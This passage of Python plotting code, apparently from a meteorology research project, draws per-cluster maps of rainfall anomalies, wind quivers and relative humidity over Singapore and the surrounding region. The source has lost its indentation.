levels = [int(i) for i in np.linspace(-100,100,21)]
for clus in range(optimal_k):
time.sleep(1); gc.collect()
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N)).precipitationCal.values
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
mean = np.percentile(data, 90, axis=0)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Anomaly of 90th percentile RF (in mm) relative to baseline.', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
ticks=levels
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_SGonly_ANOM_v1_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_SGonly_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOMY of proba of >1mm rainfall over SG now.\nTotal of {optimal_k} clusters, now printing cluster: ')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon", sgonly=True)
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat", sgonly=True)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 1, axis=0) * 100
baseline = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus="whole", sgonly=True)
all_colors = np.vstack(plt.cm.RdBu(np.linspace(0,1,21)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 1mm, SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels = [int(i) for i in np.linspace(-100,100,21)]
# levels = [int(i) for i in np.linspace(-25,25,11)]
levels1 = np.linspace(-25,25,101)
levels2 = np.arange(-25, 25.5, 2)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 1, axis=0)*100
mean = get_RF_calculations(model, 'gt1mm', calculation='mean', clus=clus, sgonly=True)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
# levels,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:10], levels2[11:]]),
colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Anomaly of gt1mm RF (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
# ticks=levels
ticks = levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_SGonly_ANOM_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_SGonly_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting proba of >1mm rainfall over SG now.\nTotal of {optimal_k} clusters. ')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', sgonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', sgonly=True)
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
levels = [int(i) for i in np.linspace(25,75,11)]
all_colors = np.vstack(plt.cm.RdBu(np.linspace(0,1,21)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Rainfall predictions, SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels1 = np.linspace(25,75,101)
levels1 = np.linspace(0,100,201)
# levels2 = np.arange(25, 75.5, 5)
levels2 = np.arange(0, 100.5, 5)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 1, axis=0)*100
# mean = mean-baseline
mean = get_RF_calculations(model, 'gt1mm', calculation='mean', clus=clus, sgonly=True)
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
# levels,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'y', linewidths=0.02)
ax_rf_plot.clabel(conts,
# conts.levels,
levels2,
colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%)', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_SGonly_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
def print_rf_heavy_gt50mm_SGonly_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM proba of >50mm rainfall over SG now.\nTotal of {optimal_k} clusters, now printing cluster: ')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', sgonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', sgonly=True)
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 50, axis=0) * 100
baseline = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus="whole", sgonly=True)
all_colors = np.vstack(plt.cm.BrBG(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels1 = np.linspace(-5,5,81)
levels2 = np.arange(-5, 5.5, .5)
fig.suptitle(f'Anomaly for rainfall above 50mm, SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels = [int(i) for i in np.linspace(-20,20,21)]
for clus in range(optimal_k):
time.sleep(1); gc.collect()
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 50, axis=0)*100
mean = get_RF_calculations(model, 'gt50mm', calculation='mean', clus=clus, sgonly=True)
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
# levels,
levels1,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:10], levels2[11:]]),
colors='k', inline=True, fmt='%1.2f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
# ticks=levels
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_SGonly_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_quiver_Regionalonly(model, dest, optimal_k):
quiverstarttime = timer(); print(f'{utils.time_now()} - Drawing quiver sub-plots over regional now.\nTotal of {optimal_k} clusters, now printing cluster: ')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
area = (e_lim_regional-w_lim_regional)*(n_lim_regional-s_lim_regional)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
# ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_qp.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids);
time.sleep(1); gc.collect()
u = uwnd_gridded_centroids/wndspd;
v = vwnd_gridded_centroids/wndspd;
spd_plot = ax_qp.contourf(lon, lat, wndspd, np.linspace(0,18,19),
# spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon, lat, u, v, color='Black', minshaft=minshaft, scale=scale)
# Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Quiver (m/s)', orientation='horizontal',pad=0.01)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_Regionalonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_quiver_ANOM_Regionalonly(model, dest, optimal_k):
quiverstarttime = timer(); print(f'{utils.time_now()} - Finishing quiver ANOMALY plots (regional)...')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
area = (e_lim_regional-w_lim_regional)*(n_lim_regional-s_lim_regional)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-10,10,21)]
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
uwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean("time")
vwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean("time")
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
uwnd_mean = uwnd_gridded_centroids - uwnd_baseline
vwnd_mean = vwnd_gridded_centroids - vwnd_baseline
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hpa for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_mean,uwnd_mean);
u = uwnd_mean/wndspd;
v = vwnd_mean/wndspd;
spd_plot = ax_qp.contourf(lon, lat, wndspd, levels,
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon, lat, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Quiver (m/s)', orientation='horizontal',pad=0.01,
ticks=levels)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver ANOMALY plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_Regionalonly_ANOM-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver ANOMALY plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_RHUM_Regionalonly(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM plots (regional)...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Pressure: {pressure} hpa, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(lon, lat, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity (%)', orientation='horizontal', pad=0.01);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"{utils.time_now()} - clus {cluster}")
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_Regionalonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM: {utils.time_since(rhumstarttime)}.")
def print_RHUM_ANOM_Regionalonly(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM ANOMALY plots (regional)...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-40,40,24)]
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
baseline = target_ds_withClusterLabels.sel(level=pressure).rhum.mean("time")
for cluster in range(optimal_k):
